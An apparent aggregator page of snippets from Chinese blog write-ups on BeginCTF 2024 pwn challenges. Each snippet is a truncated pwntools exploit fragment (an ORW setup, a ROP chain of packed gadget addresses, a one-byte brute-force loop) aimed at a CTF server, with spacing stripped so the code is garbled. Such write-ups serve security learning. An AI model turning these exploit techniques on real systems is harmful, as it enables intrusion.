beginctf2024+pwn

2025-05-04 16:06:19

拼音 [ 拼音 ]

2024beginctfpwn题解wp_杭电老油条的技术博客_51CTO博客

再偏移算好之后就简单了,把正常的ORW流程走一遍就行,exp我贴这了 frompwnimport*context(terminal=['tmux','splitw','-h'],os="linux",arch="amd64",# arch = "i386",log_level="debug",)# io = remote("101.32.220.189",31129)io=process("./aladdin")defdebug():gdb.attach(io,''' b *$re...
杂七杂八wp(NewStar_Week1和BeginCTF2024的部分pwn) - Falling_Dusk...

from pwn import *context(arch='amd64', os='linux', log_level='debug')#elf = process('../gift_rop')elf = remote('101.32.220.189',30432)from struct importpack# Padding goes herep = b''p +=pack('<Q',0x0000000000409f9e)# pop rsi ; retp +=pack('<Q',0x00000000004c50e0)# @ ....
Beginctf 2024 pwn部分题解_wx65ffae9bc4312的技术博客_51CTO博客

frompwnimport*#context.log_level = 'debug'#io = process('./one_byte')io=remote('101.32.220.189',30300)#gdb.attach(io,'b *$rebase(0x1285)')flag=b""flag+=b"b"foriinrange(100):payload=b'a'*17+b'\x57'io.recvuntil(b'with the result?')io.send(payload)io.recvuntil(b'gift: ')...